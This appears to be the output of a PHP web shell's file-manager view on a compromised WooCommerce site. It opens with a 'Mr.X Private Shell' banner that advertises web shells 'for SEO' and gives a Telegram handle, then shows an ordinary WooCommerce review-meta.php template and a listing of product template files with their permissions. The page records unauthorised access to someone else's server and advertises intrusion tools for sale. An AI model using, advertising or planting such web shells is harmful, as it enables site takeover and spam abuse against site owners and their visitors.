__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* The template to display the reviewers meta data (name, verified owner, review date)
*
* This template can be overridden by copying it to yourtheme/woocommerce/single-product/review-meta.php.
*
* HOWEVER, on occasion WooCommerce will need to update template files and you
* (the theme developer) will need to copy the new files to your theme to
* maintain compatibility. We try to do this as little as possible, but it does
* happen. When this occurs the version of the template file will be bumped and
* the readme will list any important changes.
*
* @see https://woocommerce.com/document/template-structure/
* @package WooCommerce\Templates
* @version 3.4.0
*/
defined( 'ABSPATH' ) || exit;
global $comment;
$verified = wc_review_is_from_verified_owner( $comment->comment_ID );
if ( '0' === $comment->comment_approved ) { ?>
<p class="meta">
<em class="woocommerce-review__awaiting-approval">
<?php esc_html_e( 'Your review is awaiting approval', 'woocommerce' ); ?>
</em>
</p>
<?php } else { ?>
<p class="meta">
<strong class="woocommerce-review__author"><?php comment_author(); ?> </strong>
<?php
if ( 'yes' === get_option( 'woocommerce_review_rating_verification_label' ) && $verified ) {
echo '<em class="woocommerce-review__verified verified">(' . esc_attr__( 'verified owner', 'woocommerce' ) . ')</em> ';
}
?>
<span class="woocommerce-review__dash">–</span> <time class="woocommerce-review__published-date" datetime="<?php echo esc_attr( get_comment_date( 'c' ) ); ?>"><?php echo esc_html( get_comment_date( wc_date_format() ) ); ?></time>
</p>
<?php
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| add-to-cart | Folder | 0775 |
|
|
| tabs | Folder | 0775 |
|
|
| back-in-stock-form.php | File | 2.56 KB | 0664 |
|
| meta.php | File | 1.58 KB | 0664 |
|
| photoswipe.php | File | 2.4 KB | 0664 |
|
| price.php | File | 861 B | 0664 |
|
| product-attributes.php | File | 1.39 KB | 0664 |
|
| product-image.php | File | 2.56 KB | 0664 |
|
| product-thumbnails.php | File | 1.56 KB | 0664 |
|
| rating.php | File | 1.4 KB | 0664 |
|
| related.php | File | 2.01 KB | 0664 |
|
| review-meta.php | File | 1.59 KB | 0664 |
|
| review-rating.php | File | 930 B | 0664 |
|
| review.php | File | 1.77 KB | 0664 |
|
| sale-flash.php | File | 1.02 KB | 0664 |
|
| share.php | File | 942 B | 0664 |
|
| short-description.php | File | 994 B | 0664 |
|
| stock.php | File | 771 B | 0664 |
|
| title.php | File | 770 B | 0664 |
|
| up-sells.php | File | 1.44 KB | 0664 |
|